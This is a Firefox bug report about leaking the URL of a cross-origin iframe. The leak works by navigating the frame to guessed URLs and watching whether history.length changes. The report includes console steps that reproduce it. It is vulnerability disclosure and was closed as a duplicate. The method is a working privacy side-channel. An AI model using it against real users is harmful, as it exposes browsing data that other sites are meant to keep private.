Closed Bug 1747809 Opened 3 years ago Closed 3 years ago

Leaking cross-origin iframe URLs using history.length

Categories

(Core :: DOM: Navigation, defect)

Product:
Core
Component:
DOM: Navigation
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1315203

People

(Reporter: sivaneshashok, Unassigned)

References

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

When an iframe is navigated to its current URL, the value of history.length does not increase. However, when it's replaced with any other URL, the value of history.length increases by 1.
This behavior could be used to find the exact URL of an iframe, even if it is cross-origin.

Tested on - Firefox Browser 95.0.2 (64-bit)

STEPS TO REPRODUCE:

  1. Host an HTML file with the following contents
    <html><body><iframe src="http://example.com/secret"></body></html>
  2. Open browser's console and check history.length
  3. Run the following in console - window.frames[0].location = "http://example.com/secret"
  4. Now, check history.length, and it should be the same as before.
  5. Run the following in console - window.frames[0].location = "http://example.com/abc"
  6. Now history.length would have increased.

This behavior could be automated to find the exact URL of the cross-origin iframe.

ATTACK SCENARIO:
A cross-origin page could potentially exploit this to find out the exact URL of the cross-origin iframe, which could leak sensitive information.

Flags: sec-bounty?
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Navigation
Product: Firefox → Core

Various history.length related issues are discussed in the spec issue https://github.com/whatwg/html/issues/2018
(and IIRC there are also other related HTML spec issues open)

Severity: -- → S3
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
Group: dom-core-security
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.